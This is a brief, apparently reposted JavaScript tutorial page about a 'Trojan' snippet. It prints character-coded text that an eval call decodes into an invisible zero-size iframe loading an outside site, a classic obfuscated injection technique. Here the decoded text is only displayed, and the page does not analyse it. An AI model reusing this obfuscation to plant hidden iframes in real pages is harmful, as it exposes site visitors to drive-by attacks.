Home >Web Front-end >JS Tutorial >js eval Trojan code, analyze it later_javascript skills

js eval Trojan code, analyze it later_javascript skills

WBOY
WBOYOriginal
2016-05-16 19:15:561093browse

From the Trojan below, I found another way to write js


[Ctrl A Select all Note: If you need to introduce external Js, you need to refresh to execute
]
The code is as follows:








<script> p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"; p=eval("String.fromCharCode("+p+")"); document.getElementById('theid').innerText=p; </script>
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn